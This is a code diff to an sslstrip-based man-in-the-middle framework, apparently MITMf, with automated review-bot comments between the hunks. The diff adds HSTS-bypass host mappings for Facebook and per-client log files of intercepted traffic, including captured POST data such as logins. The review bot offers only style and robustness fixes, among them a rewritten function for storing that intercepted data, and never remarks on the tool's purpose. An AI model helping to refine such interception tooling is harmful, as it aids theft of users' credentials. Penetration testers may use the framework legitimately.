diff --git a/config_files/hsts_bypass.cfg b/config_files/hsts_bypass.cfg index 2b02ed0..06d1ece 100644 --- a/config_files/hsts_bypass.cfg +++ b/config_files/hsts_bypass.cfg @@ -7,4 +7,5 @@ mail.google.com = gmail.google.com accounts.google.se = cuentas.google.se #for facebook -www.facebook.com = social.facebook.com \ No newline at end of file +www.facebook.com = social.facebook.com +facebook.com = social.facebook.com \ No newline at end of file diff --git a/mitmf.py b/mitmf.py index b9d844e..1f8c286 100755 --- a/mitmf.py +++ b/mitmf.py @@ -28,7 +28,7 @@ if __name__ == "__main__": slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)") slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.") slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.") - #slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') + slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") @@ -83,7 +83,7 @@ if __name__ == "__main__": from sslstrip.StrippingProxyHSTS import StrippingProxy from sslstrip.URLMonitorHSTS import URLMonitor - URLMonitor.getInstance().setFaviconSpoofing(args.favicon) + URLMonitor.getInstance().setValues(args.favicon, args.clients) CookieCleaner.getInstance().setEnabled(args.killsessions) ProxyPlugins.getInstance().setPlugins(load) 
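Review bot: The re-enabled `-c/--clients` option in the `@@ -28,7 +28,7 @@` hunk keeps a help string that misspells "separate" and does not say where the per-client files end up. The URLMonitor change later in this diff writes them under `./logs`, relative to the working directory. Suggested line: `slogopts.add_argument("-c", "--clients", action="store_true", help="Log each client's data to a separate file under ./logs")`. `default=False` is already implied by `store_true` and can be dropped.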
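Review bot: In the `@@ -83,7 +83,7 @@` hunk `URLMonitor` is imported from `sslstrip.URLMonitorHSTS`, but the part of the diff visible here adds `setValues` only to `sslstrip/URLMonitor.py`. The single hunk shown for `URLMonitorHSTS.py` touches host substitution and logging only. Unless that class already defines `setValues`, `isClientLogging` and `writeClientLog`, this call raises AttributeError at startup on the HSTS path. Either add the same methods there or keep `URLMonitor.getInstance().setFaviconSpoofing(args.favicon)` in this branch until they exist. The enclosing `if __name__ == "__main__":` block starts and ends outside the hunk.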
@@ -100,7 +100,7 @@ if __name__ == "__main__": from sslstrip.StrippingProxy import StrippingProxy from sslstrip.URLMonitor import URLMonitor - URLMonitor.getInstance().setFaviconSpoofing(args.favicon) + URLMonitor.getInstance().setValues(args.favicon, args.clients) CookieCleaner.getInstance().setEnabled(args.killsessions) ProxyPlugins.getInstance().setPlugins(load) diff --git a/sslstrip/ClientRequestHSTS.py b/sslstrip/ClientRequestHSTS.py index 26dfaf3..8ebe49f 100644 --- a/sslstrip/ClientRequestHSTS.py +++ b/sslstrip/ClientRequestHSTS.py @@ -78,11 +78,11 @@ class ClientRequest(Request): del headers['if-none-match'] if 'host' in headers: - host = self.urlMonitor.URLgetRealHost("%s" % headers['host']) - logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host)) - headers['host'] = host - headers['securelink'] = '1' - self.setHeader('Host',host) + host = self.urlMonitor.URLgetRealHost("%s" % headers['host']) + logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host)) + headers['host'] = host + headers['securelink'] = '1' + self.setHeader('Host',host) self.plugins.hook() @@ -116,7 +116,12 @@ class ClientRequest(Request): host = self.urlMonitor.URLgetRealHost("%s" % lhost) client = self.getClientIP() path = self.getPathFromUri() - self.content.seek(0, 0) + + try: + self.content.seek(0, 0) + except: + pass + postData = self.content.read() real = self.urlMonitor.real patchDict = self.urlMonitor.patchDict diff --git a/sslstrip/ServerConnection.py b/sslstrip/ServerConnection.py index cdef64b..ebea273 100644 --- a/sslstrip/ServerConnection.py +++ b/sslstrip/ServerConnection.py 
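Review bot: The bare `except: pass` added around `self.content.seek(0, 0)` in the `@@ -116,7 +116,12 @@` hunk hides every failure, including KeyboardInterrupt and SystemExit. The unguarded `self.content.read()` on the next line will probably fail the same way if the seek did. Catch `Exception` and record it instead, e.g. `except Exception as e: logging.debug("Could not rewind request body: %s" % e)`. The same bare-except pattern is added around `self.client.finish()` in sslstrip/ServerConnectionFactory.py (`@@ -40,5 +40,7 @@`) and deserves the same treatment. The enclosing method starts outside the hunk.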
@@ -54,7 +54,12 @@ class ServerConnection(HTTPClient): def sendRequest(self): if self.command == 'GET': - logging.info("%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host'])) + message = "%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host']) + if self.urlMonitor.isClientLogging() is True: + self.urlMonitor.writeClientLog(self.client, self.headers, message) + else: + logging.info(message) + self.plugins.hook() self.sendCommand(self.command, self.uri) @@ -71,7 +76,11 @@ class ServerConnection(HTTPClient): elif 'keylog' in self.uri: self.plugins.hook() else: - logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData)) + message = "%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData) + if self.urlMonitor.isClientLogging() is True: + self.urlMonitor.writeClientLog(self.client, self.headers, message) + else: + logging.warning(message) self.transport.write(self.postData) def connectionMade(self): @@ -88,6 +97,8 @@ class ServerConnection(HTTPClient): self.client.setResponseCode(int(code), message) def handleHeader(self, key, value): + self.plugins.hook() + if (key.lower() == 'location'): value = self.replaceSecureLinks(value) @@ -100,8 +111,9 @@ class ServerConnection(HTTPClient): if (value.find('gzip') != -1): logging.debug("Response is compressed...") self.isCompressed = True - if (key.lower() == 'strict-transport-security'): - value = 'max-age=0' + + #if (key.lower() == 'strict-transport-security'): + # value = 'max-age=0' elif (key.lower() == 'content-length'): self.contentLength = value @@ -110,8 +122,6 @@ class ServerConnection(HTTPClient): else: self.client.setHeader(key, value) - self.plugins.hook() - def handleEndHeaders(self): if (self.isImageRequest and self.contentLength != None): self.client.setHeader("Content-Length", self.contentLength) 
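Review bot: `if self.urlMonitor.isClientLogging() is True:` passes only for the literal `True`. It works today because argparse supplies a bool, but any other truthy value stored through `setValues` would silently fall back to `logging.info`; write `if self.urlMonitor.isClientLogging():`. The same if/else is repeated for the POST branch in the next hunk (`@@ -71,7 +76,11 @@`), so one small helper on ServerConnection taking the message and the fallback logging function would keep the two paths from drifting. With client logging on, these messages also bypass the logging module's handlers and formatting entirely. `sendRequest` continues outside the hunk.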
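Review bot: Nothing in the `@@ -88,6 +97,8 @@` hunk explains why `self.plugins.hook()` now runs at the top of `handleHeader` instead of after the header has been processed; the old call is removed in `@@ -110,8 +122,6 @@`. `hook()` is not visible here, but if plugins read `key` and `value` from the caller, they will now see them before `replaceSecureLinks` and the other rewrites run. Add a comment stating the intent, e.g. `# Run plugins first so they see the header as received`. The method body continues outside the hunk.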
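Review bot: Commenting out the `strict-transport-security` test in the `@@ -100,8 +111,9 @@` hunk leaves the following `elif (key.lower() == 'content-length'):` attached to whichever `if` precedes it. That appears to be the `content-encoding` check, whose header line is above this hunk. If so, the change affects more than one header: `Content-Encoding` would no longer reach the final `else: self.client.setHeader(key, value)`. If that is intended, delete the two dead lines instead of leaving them commented and add a comment such as `# content-encoding is consumed here and not forwarded`. If not, turn the `elif` on `content-length` into a plain `if` so the chain starts where it did before.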
diff --git a/sslstrip/ServerConnectionFactory.py b/sslstrip/ServerConnectionFactory.py index 793bdc6..f694fc0 100644 --- a/sslstrip/ServerConnectionFactory.py +++ b/sslstrip/ServerConnectionFactory.py @@ -40,5 +40,7 @@ class ServerConnectionFactory(ClientFactory): logging.debug("Retrying via SSL") self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) else: - self.client.finish() - + try: + self.client.finish() + except: + pass diff --git a/sslstrip/StrippingProxy.py b/sslstrip/StrippingProxy.py index f4c1e89..8a626df 100644 --- a/sslstrip/StrippingProxy.py +++ b/sslstrip/StrippingProxy.py @@ -20,6 +20,7 @@ from twisted.web.http import HTTPChannel from ClientRequest import ClientRequest class StrippingProxy(HTTPChannel): + '''sslstrip is, at heart, a transparent proxy server that does some unusual things. This is the basic proxy server class, where we get callbacks for GET and POST methods. We then proxy these out using HTTP or HTTPS depending on what information we have about diff --git a/sslstrip/URLMonitor.py b/sslstrip/URLMonitor.py index 6d6f803..ebbb871 100644 --- a/sslstrip/URLMonitor.py +++ b/sslstrip/URLMonitor.py @@ -16,7 +16,7 @@ # USA # -import re +import re, os class URLMonitor: 
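Review bot: `import re, os` in the sslstrip/URLMonitor.py hunk puts two modules in one statement; PEP 8 asks for one import per line, which also keeps later diffs to this block to a single line each. Write `import os` and `import re` on separate lines.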
@@ -41,6 +41,25 @@ class URLMonitor: return (client,url) in self.strippedURLs + def writeClientLog(self, client, headers, message): + if not os.path.exists("./logs"): + os.makedirs("./logs") + + if (client.getClientIP() + '.log') not in os.listdir("./logs"): + + try: + log_message = "#Log file for %s (%s)\n" % (client.getClientIP(), headers['user-agent']) + except KeyError: + log_message = "#Log file for %s\n" % client.getClientIP() + + log_file = open("./logs/" + client.getClientIP() + ".log", 'a') + log_file.write(log_message + message + "\n") + log_file.close() + else: + log_file = open("./logs/" + client.getClientIP() + ".log", 'a') + log_file.write(message + "\n") + log_file.close() + def getSecurePort(self, client, url): if (client,url) in self.strippedURLs: return self.strippedURLPorts[(client,url)] @@ -69,12 +88,16 @@ class URLMonitor: self.strippedURLs.add((client, url)) self.strippedURLPorts[(client, url)] = int(port) - def setFaviconSpoofing(self, faviconSpoofing): + def setValues(self, faviconSpoofing, clientLogging): self.faviconSpoofing = faviconSpoofing + self.clientLogging = clientLogging def isFaviconSpoofing(self): return self.faviconSpoofing + def isClientLogging(self): + return self.clientLogging + def isSecureFavicon(self, client, url): return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1)) diff --git a/sslstrip/URLMonitorHSTS.py b/sslstrip/URLMonitorHSTS.py index 35262ce..164da92 100644 --- a/sslstrip/URLMonitorHSTS.py +++ b/sslstrip/URLMonitorHSTS.py 
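Review bot: `writeClientLog` in the `@@ -41,6 +41,25 @@` hunk lists the whole `./logs` directory on every message to decide whether the file is new, opens the file without a `with` block so the handle leaks if `write` raises, and repeats the open/write/close sequence in both branches. The exists-then-`makedirs` check can also race when two connections log at the same moment, and `./logs` depends on the process working directory. The version below builds the path once with `os.path.join`, tests that single path, tolerates the directory appearing concurrently and closes the file on every exit; the header line is still written only when the file does not exist yet. The `user-agent` value and the message body are client-supplied and written verbatim, so whatever reads these files should treat their contents as untrusted.

```python
    def writeClientLog(self, client, headers, message):
        client_ip = client.getClientIP()
        log_dir = "./logs"
        log_path = os.path.join(log_dir, client_ip + ".log")

        if not os.path.isdir(log_dir):
            try:
                os.makedirs(log_dir)
            except OSError:
                # Another connection may have created it between the check and the call.
                if not os.path.isdir(log_dir):
                    raise

        lines = []
        if not os.path.exists(log_path):
            try:
                lines.append("#Log file for %s (%s)\n" % (client_ip, headers['user-agent']))
            except KeyError:
                lines.append("#Log file for %s\n" % client_ip)
        lines.append(message + "\n")

        with open(log_path, 'a') as log_file:
            log_file.writelines(lines)
```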
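Review bot: Renaming `setFaviconSpoofing` to `setValues` in the `@@ -69,12 +88,16 @@` hunk removes the old setter, so any caller outside this diff that still uses it breaks. `clientLogging` is also assigned only here; if `__init__` (not visible) does not set it, `isClientLogging()` raises AttributeError whenever `setValues` has not run. Keep `setFaviconSpoofing` and add a separate `setClientLogging(self, clientLogging)`, and initialise `self.clientLogging = False` in the constructor. A setter per setting also reads better at the call sites in mitmf.py than two positional booleans passed to `setValues`.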
@@ -64,14 +64,14 @@ class URLMonitor: #LEO: Sustituir HOST if not self.sustitucion.has_key(host): - lhost = host[:4] - if lhost=="www.": + lhost = host[:4] + if lhost=="www.": self.sustitucion[host] = "w"+host self.real["w"+host] = host - else: + else: self.sustitucion[host] = "web"+host self.real["web"+host] = host - #logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) ) + logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) ) url = 'http://' + host + path #logging.debug("LEO stripped URL: %s %s"%(client, url))
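Review bot: This hunk mixes a pure re-indentation with a behaviour change: the `logging.info("LEO: ssl host ...")` call is now live, while the other logging line in the hunk stays commented out. The module's imports are outside the hunk, so confirm that `logging` is imported in URLMonitorHSTS.py; otherwise the first substituted host raises NameError. The message would read better without the author tag and at debug level, e.g. `logging.debug("SSL host %s mapped to %s" % (host, self.sustitucion[host]))`.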